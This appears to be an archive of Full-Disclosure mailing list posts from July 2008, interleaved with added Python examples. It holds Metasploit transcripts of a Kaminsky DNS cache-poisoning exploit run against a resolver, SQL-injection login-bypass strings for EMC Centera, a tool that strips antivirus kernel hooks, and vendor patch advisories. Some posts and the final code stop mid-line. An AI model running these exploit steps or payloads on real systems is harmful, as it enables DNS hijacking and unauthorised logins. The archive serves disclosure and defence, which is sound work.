[Full-disclosure] CAU-EX-2008-0003: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

2008-07-23 Thread I)ruid
Computer Academic Underground
http://www.caughq.org
Exploit Code

===/
Exploit ID:     CAU-EX-2008-0003
Release Date:   2008.07.23
Title:          bailiwicked_domain.rb
Description:    Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Tested:         BIND 9.4.1-9.4.2
Attributes:     Remote, Poison, Resolver, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Author/Email:   I)ruid
                H D Moore
===/

Description
===

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allows the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing the target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.


Example
===

# /msf3/msfconsole



   =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
   =[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*]  Got an NS record: example.com.  171957  IN  NS  b.iana-servers.net.
[*]   Querying recon nameserver for address of b.iana-servers.net
[*]  Got an A record: b.iana-servers.net.  171028  IN  A  193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*]  Got an NS record: example.com.  171957  IN  NS  a.iana-servers.net.
[*]   Querying recon nameserver for address of a.iana-servers.net
[*]  Got an A record: a.iana-servers.net.  171414  IN  A  192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 2 spoofed responses...
[*] Sent 2000 queries and 4 spoofed responses...
[*] Sent 3000 queries and 6 spoofed responses...
[*] Sent 4000 queries and 8 spoofed responses...
[*] Sent 5000 queries and 10 spoofed responses...
[*] Sent 6000 queries and 12 spoofed responses...
[*] Sent 7000 queries and 14 spoofed responses...
[*] Sent 8000 queries and 16 spoofed responses...
[*] Sent 9

[Full-disclosure] CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit

2008-07-23 Thread I)ruid
Computer Academic Underground
http://www.caughq.org
Exploit Code

===/
Exploit ID:     CAU-EX-2008-0002
Release Date:   2008.07.23
Title:          bailiwicked_host.rb
Description:    Kaminsky DNS Cache Poisoning Flaw Exploit
Tested:         BIND 9.4.1-9.4.2
Attributes:     Remote, Poison, Resolver, Metasploit
Exploit URL:    http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
Author/Email:   I)ruid
                H D Moore
===/

Description
===

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allows the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious host entry
into the target nameserver.  By causing the target nameserver to query
for random hostnames at the target domain, the attacker can spoof a
response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing the target nameserver to insert the additional record into the
cache.


Example
===

# /msf3/msfconsole

_  _   _ _
   | || | (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


   =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
   =[ 72 aux

msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > show options

Module options:

   Name      Current Setting    Required  Description
   ----      ---------------    --------  -----------
   HOSTNAME  pwned.example.com  yes       Hostname to hijack
   NEWADDR   1.3.3.7            yes       New address for hostname
   RECONS    208.67.222.222     yes       Nameserver used for reconnaissance
   RHOST                        yes       The target address
   SRCPORT                      yes       The target server's source query port (0 for automatic)
   XIDS      10                 yes       Number of XIDs to try for each query

msf auxiliary(bailiwicked_host) > set RHOST A.B.C.D
RHOST => A.B.C.D

msf auxiliary(bailiwicked_host) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*] FAIL: This server uses static source ports and is vulnerable to poisoning

msf auxiliary(bailiwicked_host) > set SRCPORT 0
SRCPORT => 0

msf auxiliary(bailiwicked_host) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Targeting nameserver A.B.C.D
[*] Querying recon nameserver for example.com.'s nameservers...
[*]  Got answer with 2 answers, 0 authorities
[*]  Got an NS record: example.com.  172643  IN  NS  ns89.worldnic.com.
[*] Querying recon nameserver for address of ns89.worldnic.com
[*]  Got answer with 1 answers, 0 authorities
[*]  Got an A record: ns89.worldnic.com.  172794  IN  A  205.178.190.45
[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com
[*]   ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
[*]  Got an NS record: example.com.  172643  IN  NS  ns90.worldnic.com.
[*] Querying recon nameserver for address of ns90.worldnic.com
[*]  Got answer with 1 answers, 0 authorities
[*]  Got an A record: ns90.worldnic.com.  172794  IN  A  205.178.144.45
[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com
[*]   ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...
[*] Sent 1000 queries and 2 spoofed responses...
[*] Sent 2000 queries and 4 spoofed responses...
[*] Sent 3000 queries and 6 spoofed responses...
[*] Sent 4000 queries and 8 spoofed responses...
[*] Sent 5000 queries and 10 spoofed responses...
[*] Sent 6000 queries and 12 spoofed responses...
[*] Sent 7000 queries and 14 spoofed responses...
[*] Poiso
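The `check` step in both transcripts above judges the resolver by one thing: whether the UDP source port of its outgoing queries changes from query to query. The Python below is an added example, not the module's code and not from the original posts; it parses check-style output lines, makes the same static-versus-varying judgement, and reports the guess space a forged reply has to beat. The sample lines, the 192.0.2.53 address, the port values and the 64512-port ephemeral range are all constructed or assumed here.

```python
import math
import re
from collections import Counter

# Constructed samples in the shape of the bailiwicked_* "check" output.
# 192.0.2.0/24 is documentation address space; the ports are made up.
STATIC_SAMPLE = """\
[*]  >> ADDRESS: 192.0.2.53  PORT: 50391
[*]  >> ADDRESS: 192.0.2.53  PORT: 50391
[*]  >> ADDRESS: 192.0.2.53  PORT: 50391
[*]  >> ADDRESS: 192.0.2.53  PORT: 50391
[*]  >> ADDRESS: 192.0.2.53  PORT: 50391
"""

SEQUENTIAL_SAMPLE = """\
[*]  >> ADDRESS: 192.0.2.53  PORT: 32770
[*]  >> ADDRESS: 192.0.2.53  PORT: 32771
[*]  >> ADDRESS: 192.0.2.53  PORT: 32772
[*]  >> ADDRESS: 192.0.2.53  PORT: 32773
[*]  >> ADDRESS: 192.0.2.53  PORT: 32774
"""

RANDOM_SAMPLE = """\
[*]  >> ADDRESS: 192.0.2.53  PORT: 1034
[*]  >> ADDRESS: 192.0.2.53  PORT: 48211
[*]  >> ADDRESS: 192.0.2.53  PORT: 7719
[*]  >> ADDRESS: 192.0.2.53  PORT: 61002
[*]  >> ADDRESS: 192.0.2.53  PORT: 30456
"""

LINE_RE = re.compile(r"ADDRESS:\s*(\S+)\s+PORT:\s*(\d+)")

XID_SPACE = 1 << 16             # 16-bit DNS transaction ID
EPHEMERAL_PORTS = 65536 - 1024  # assumed: resolver may pick any port above 1023


def parse_check_output(text):
    """Return the (address, port) pairs found in check-style output lines."""
    return [(m.group(1), int(m.group(2))) for m in LINE_RE.finditer(text)]


def classify_source_ports(ports):
    """Classify the source ports a resolver used for successive queries.

    static      one port reused for every query (the FAIL verdict above)
    sequential  constant step between queries, as guessable as static
    varying     no repeat and no constant step in the sample
    """
    if len(ports) < 3:
        raise ValueError("need at least three observed queries")
    if len(set(ports)) == 1:
        return "static"
    steps = {b - a for a, b in zip(ports, ports[1:])}
    if len(steps) == 1:
        return "sequential"
    return "varying"


def spoof_guess_space(kind):
    """Number of (XID, port) combinations a forged reply must hit.

    With a predictable port only the 16-bit XID stands between a forged
    answer and the cache; port randomisation multiplies that by the number
    of ports the resolver can choose from.
    """
    if kind in ("static", "sequential"):
        return XID_SPACE
    return XID_SPACE * EPHEMERAL_PORTS


def verdict(text):
    """One-line judgement in the style of the module's check output."""
    ports = [p for _, p in parse_check_output(text)]
    kind = classify_source_ports(ports)
    bits = math.log2(spoof_guess_space(kind))
    if kind == "varying":
        return "PASS: %d distinct ports over %d queries; ~2^%.1f guesses per hit" % (
            len(set(ports)), len(ports), bits)
    return "FAIL: %s source port (%d); only ~2^%.0f XID guesses per hit" % (
        kind, ports[0], bits)


if __name__ == "__main__":
    for sample in (STATIC_SAMPLE, SEQUENTIAL_SAMPLE, RANDOM_SAMPLE):
        print(verdict(sample))
```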

[Full-disclosure] [ MDVSA-2008:154 ] - Updated xemacs packages fix vulnerability

2008-07-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:154
 http://www.mandriva.com/security/
 ___
 
 Package : xemacs
 Date: July 23, 2008
 Affected: Corporate 3.0
 ___
 
 Problem Description:
 
 A vulnerability in xemacs was found where an attacker could provide
 a group of files containing local variable definitions and arbitrary
 Lisp code to be executed when one of the provided files is opened by
 xemacs (CVE-2008-2142).
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2008:153 ] - Updated emacs packages fix vulnerability

2008-07-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:153
 http://www.mandriva.com/security/
 ___
 
 Package : emacs
 Date: July 23, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A vulnerability in emacs was found where an attacker could provide
 a group of files containing local variable definitions and arbitrary
 Lisp code to be executed when one of the provided files is opened by
 emacs (CVE-2008-2142).
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142
 ___
 
 Updated Packages:
 

[Full-disclosure] [tool] SDT Cleaner 1.0

2008-07-23 Thread Nahuel C. Riva

Hello!

You can find it here:
http://oss.coresecurity.com/projects/sdtcleaner.html

Package:
http://oss.coresecurity.com/repo/SDTCleaner-v1.0.zip

 What is the SDT Cleaner?

SDT Cleaner is a tool that intends to clean the SSDT (system service
descriptor table) from hooks.

* The SDT Cleaner allows you to clean hooks installed by Anti-Virus
and Firewalls.
* This little tool (in this first release) tries to collect info
from your current kernel and then switches to kernel land and if there
are any hooks in SSDT, this tool will replace them with the original
entries.

Requirements

* In this first release, you'll just need Windows XP.
* I'm planning to add support for Windows 2000 / 2003.

Thanks!
Nahuel.

Open Source Software
Core Security Technologies







[Full-disclosure] DNS forward only: why does it help?

2008-07-23 Thread Paul Szabo
As a workaround, it is recommended to set DNS servers to forward only.
Can someone explain why that helps? Cannot responses from the forwarder
be spoofed same as normal query responses? Is it that "glue RRs" from
forwarders are discarded; or that source ports of forwarded requests are
better randomized than normal queries; or that forwarding is done with
TCP not UDP?

The "published attack" has ns.victim.com spoofed. That does not affect a
server set to forward only. Could the attacker spoof login.victim.com
directly, and would not that affect a forward only server equally?

Thanks,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



[Full-disclosure] [SECURITY] [DSA 1540-3] New lighttpd packages fix regression

2008-07-23 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1540-3  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
July 23, 2008 http://www.debian.org/security/faq
- 

Package: lighttpd
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-1531

This update fixes a regression in lighttpd introduced in DSA-1540,
causing SSL failures. For reference the original advisory text is
quoted below.

It was discovered that lighttpd, a fast webserver with minimal memory
footprint, did not correctly handle SSL errors.  This could allow
a remote attacker to disconnect all active SSL connections.

For the stable distribution (etch), this problem has been fixed in
version 1.4.13-4etch10.

We recommend that you upgrade your lighttpd package.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---


[Full-disclosure] Vulnerability Report: EMC Centera Universal Access

2008-07-23 Thread Aaron Brown
adMERITia Vulnerability Report
Vulnerability Information

Vendor: EMC²
Product: Centera Universal Access
Version: CUA4.0_4735.p4

Vulnerability Type: Software Flaw

Vulnerability: SQL Injection

Impact: Attacker can bypass the authentication method and will be logged in as 
an arbitrary user. With specific knowledge of user names it is possible for an 
attacker to choose the user he/she wishes to log in as without a password.

Description: The user name field of the CUA Module Login does not sanitize user 
input allowing for an attacker to run arbitrary SQL code. Through "--" syntax 
it is possible to comment out the password check allowing an attacker to log in 
with the first available user name in the table. After performing this several 
times or by searching through the "Accounts" tab within the CUA Module an 
attacker can gather a list of all users. With this list an attacker can select 
an administrator account and log in with this by simply entering the user name 
followed by "--".

How Vulnerability can be reproduced:
For an arbitrary account enter the following in the user field: ' --
For a targeted account enter the following in the user field: 
valid_user_name' --

Release Information
Model: CENTERA_GEN_4
Software Version: CUA4.0_4735.p4
Operating System: Linux i386 V. 2.6.16.21-0.15_VCUA4_0_4735

Fix: (quote from the vendor)
"The remedy for the reported problems has been released on 30 June 2008 and is 
available on EMC Powerlink as CUA 4.0.1 Patch 1, under "Support -> Software 
Download"."
Vendor URL: www.emc.com

Vendor Status:
Vendor was informed of the problem, and was very cooperative in getting a patch 
developed for the problem. However, contact was broken off by the vendor after 
the relevant patch was released. The vendor has not yet published an advisory 
stating the reason for the latest patch or the discovered vulnerability in 
previous versions. This vulnerability was brought to the attention of the 
vendor on May 20, 2008 under the policy of responsible disclosure as documented 
at http://www.wiretrip.net/rfp/policy.html. After cooperating on a patch the 
vendor did not respond to requests to release a public advisory. Therefore we 
have taken the initiative to alert the public through various security 
publications.

Credit for this vulnerability finding should be given to:
Lars Heidelberg, adMERITia GmbH
Aaron Brown, adMERITia GmbH

Disclaimer
The information within this document may change without notice. Use of this 
information constitutes acceptance for use in an AS IS condition. There are NO 
warranties with regard to this information. In no event shall the author be 
liable for any consequences whatsoever arising out of or in connection with the 
use or spread of this information. Any use of this information lays within the 
user's responsibility.


Mit freundlichen Grüssen / With kind regards

Aaron Brown


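The bypass in the adMERITia report comes down to a login query assembled by string concatenation, so that `--` in the user name turns the password comparison into a comment. The following Python, an added example that is neither from the report nor EMC's code, puts that string-built query beside its parameterised replacement and runs both against a constructed in-memory SQLite table; the account names, passwords and column layout are invented for the demonstration and the payload is the targeted form quoted in the report.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "user"), ("admin", "h0rse-battery", "admin")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The flawed pattern: user input is spliced into the SQL text.

    With username "admin' --" the statement becomes
      SELECT ... WHERE username = 'admin' --' AND password = '...'
    and everything after -- is a comment, so the password is never compared.
    Returns the matched (username, role) row or None.
    """
    sql = (
        "SELECT username, role FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn, username, password):
    """Parameterised query: the input is bound as data and never parsed as SQL,
    so quote characters and comment markers in it have no effect."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo():
    """Run the same input through both versions and return the outcomes."""
    conn = make_db()
    payload = "admin' --"  # the targeted form quoted in the report
    return {
        "vulnerable": login_vulnerable(conn, payload, "wrong-password"),
        "fixed": login_fixed(conn, payload, "wrong-password"),
        "fixed_legit": login_fixed(conn, "admin", "h0rse-battery"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print("%-12s -> %r" % (name, row))
```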


[Full-disclosure] [SECURITY] [DSA 1615-1] New xulrunner packages fix several vulnerabilities

2008-07-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1615-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
July 23, 2008 http://www.debian.org/security/faq
- 

Package: xulrunner
Vulnerability  : several
Problem type   : local/remote
Debian-specific: no
CVE ID : CVE-2008-2785 CVE-2008-2798 CVE-2008-2799 CVE-2008-2800 
CVE-2008-2801 CVE-2008-2802 CVE-2008-2803 CVE-2008-2805 CVE-2008-2807 
CVE-2008-2808 CVE-2008-2809 CVE-2008-2811 CVE-2008-2933

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-2785

It was discovered that missing boundary checks on a reference
counter for CSS objects can lead to the execution of arbitrary code.

CVE-2008-2798

Devon Hubbard, Jesse Ruderman and Martijn Wargers discovered
crashes in the layout engine, which might allow the execution of
arbitrary code.

CVE-2008-2799

Igor Bukanov, Jesse Ruderman and Gary Kwong discovered crashes in
the Javascript engine, which might allow the execution of arbitrary code.

CVE-2008-2800

"moz_bug_r_a4" discovered several cross-site scripting vulnerabilities.

CVE-2008-2801

Collin Jackson and Adam Barth discovered that Javascript code
could be executed in the context of signed JAR archives.

CVE-2008-2802

"moz_bug_r_a4" discovered that XUL documents can escalate
privileges by accessing the pre-compiled "fastload" file.

CVE-2008-2803

"moz_bug_r_a4" discovered that missing input sanitising in the
mozIJSSubScriptLoader.loadSubScript() function could lead to the
execution of arbitrary code. Iceweasel itself is not affected, but
some addons are.

CVE-2008-2805

Claudio Santambrogio discovered that missing access validation in
DOM parsing allows malicious web sites to force the browser to
upload local files to the server, which could lead to information
disclosure.

CVE-2008-2807

Daniel Glazman discovered that a programming error in the code for
parsing .properties files could lead to memory content being
exposed to addons, which could lead to information disclosure.

CVE-2008-2808

Masahiro Yamada discovered that file URLs in directory listings
were insufficiently escaped.

CVE-2008-2809

John G. Myers, Frank Benkstein and Nils Toedtmann discovered that
alternate names on self-signed certificates were handled
insufficiently, which could lead to spoofing of secure connections.

CVE-2008-2811

Greg McManus discovered a crash in the block reflow
code, which might allow the execution of arbitrary code.

CVE-2008-2933

Billy Rios discovered that passing a URL containing a pipe symbol
to Iceweasel can lead to Chrome privilege escalation.

For the stable distribution (etch), these problems have been fixed in
version 1.8.0.15~pre080614d-0etch1.

For the unstable distribution (sid), these problems have been fixed in
version 1.9.0.1-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d-0etch1.dsc
Size/MD5 checksum: 1984 31304658ad202bb9e5f675c17336cf3f
  
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d-0etch1.diff.gz
Size/MD5 checksum:   145874 489cde3dae0240fefe68b2f53053d8c3
  
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d.orig.tar.gz
Size/MD5 checksum: 42800584 0a4cf16412f00f337752f57395b32ef2

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/x/xulrunner/libxul-dev_1.8.0.15~pre080614d-0etch1_all.deb
Size/MD5 checksum:  2844006 fcab4e8948288b783fa4404c5c433720
  
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.8.0.15~pre080614d-0etch1_all.deb
Size/MD5 checksum:   175680 875d41d8f381cba8311fdcec7673e00a
  
http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-dev_1.8.0.15~pre080614d-0etch1_a

[Full-disclosure] [SECURITY] [DSA 1614-1] New iceweasel packages fix several vulnerabilities

2008-07-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1614-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
July 23, 2008 http://www.debian.org/security/faq
- 

Package: iceweasel
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-2785 CVE-2008-2933

Several remote vulnerabilities have been discovered in the Iceweasel
web browser, an unbranded version of the Firefox browser. The Common 
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-2785

It was discovered that missing boundary checks on a reference
counter for CSS objects can lead to the execution of arbitrary code.

CVE-2008-2933

Billy Rios discovered that passing a URL containing a pipe symbol
to Iceweasel can lead to Chrome privilege escalation.

For the stable distribution (etch), these problems have been fixed in
version 2.0.0.16-0etch1. Updated packages for ia64, arm and mips are
not yet available and will be released as soon as they have been built.

For the unstable distribution (sid), these problems have been fixed in
xulrunner 1.9.0.1-1 and iceweasel 3.0.1-1.

We recommend that you upgrade your iceweasel package.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, hppa, i386, mipsel, powerpc, 
s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1.diff.gz
Size/MD5 checksum:   186601 1a6e2029bb1be403464dc05d0d7056f3
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16.orig.tar.gz
Size/MD5 checksum: 47244084 838ff458cac5da69ac0f2102c9a4fa43
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1.dsc
Size/MD5 checksum: 1289 b20f98b6d9dea662336b8287164b326e

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-dom-inspector_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:54310 13d18b856d4e0a01e7931afef496e3ec
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox-dom-inspector_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:54460 dc8582c2f9b6f7be94c881596ce9d191
  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-gnome-support_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:54310 816c6f0fd47121ca9ab87116b631c210
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dom-inspector_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:   239618 b130c9f2f2e153789d4081b03c1f3ecf
  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:55096 c080b75d5a9b47353c070c8ae018ee93
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox-gnome-support_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:54428 6ef73c9c91f47d9d3b9695b0baba16e0
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox_2.0.0.16-0etch1_all.deb
Size/MD5 checksum:54572 fc0e196c2ac5634b69c8d393eaa83809

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.16-0etch1_alpha.deb
Size/MD5 checksum:90158 d993f5d5638bf2644992c3a51cb07aaf
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.16-0etch1_alpha.deb
Size/MD5 checksum: 51153588 537368b3db70016472e36fa96fa6d45f
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1_alpha.deb
Size/MD5 checksum: 11577992 dfcf655ebf1ab9f30e2fdd10aee79b77

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.16-0etch1_amd64.deb
Size/MD5 checksum:87828 bedb77649ba472190d25054b192b6209
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.16-0etch1_amd64.deb
Size/MD5 checksum: 10203870 5de267d5ee71e3847e73ae64872100ad
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_2.0.0.16-0etch1_amd64.deb
Size/MD5 checksum: 50156988 105ffac099d3a73aa40be32a44cd7212

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_2.0.0.16-0et
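
Both DSA-1615-1 and DSA-1614-1 above list a Size/MD5 pair for every file and describe a manual "wget url; dpkg -i file.deb" path. The following is an added example, not Debian's own tooling: a small Python checker that parses those "URL / Size/MD5 checksum:" pairs out of the advisory text and refuses to call a download good unless both size and digest match. The excerpt it parses is constructed for the example: the first entry is copied from the DSA-1615-1 text, the second (sample_1.0-1_all.deb under security.example.invalid) is made up so the demo has a file with a known digest. Note the caveat a practitioner would attach: MD5 collisions were already practical in 2008, so this catches truncated or corrupted downloads rather than a deliberate substitution; the trust anchor remains the PGP signature on the advisory and apt's signed Release files.

```python
import hashlib
import os
import re
import tempfile

# Constructed excerpt in the layout a DSA uses: a URL line followed by a
# "Size/MD5 checksum:" line. First entry copied from DSA-1615-1; the
# sample_1.0-1_all.deb entry is made up (md5 of the bytes b"hello\n").
DSA_EXCERPT = """\
Source archives:

  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614d-0etch1.dsc
    Size/MD5 checksum:     1984 31304658ad202bb9e5f675c17336cf3f

Architecture independent packages:

  http://security.example.invalid/pool/sample_1.0-1_all.deb
    Size/MD5 checksum:        6 b1946ac92492d2347c6235b4d2611184
"""

CHECKSUM_RE = re.compile(r"Size/MD5 checksum:\s+(\d+)\s+([0-9a-f]{32})")


def parse_dsa_files(text):
    """Map file name -> (size, md5) from the URL / checksum pairs in a DSA."""
    expected = {}
    pending_url = None
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("http://") or s.startswith("https://"):
            pending_url = s            # checksum line for this URL follows
            continue
        m = CHECKSUM_RE.search(s)
        if m and pending_url:
            name = pending_url.rsplit("/", 1)[-1]
            expected[name] = (int(m.group(1)), m.group(2))
            pending_url = None
    return expected


def verify_file(path, size, md5):
    """True only when both the byte size and the MD5 digest match."""
    if os.path.getsize(path) != size:
        return False
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest() == md5


def check_downloads(directory, expected):
    """Return {filename: 'ok' | 'mismatch' | 'missing'} for every listed file.

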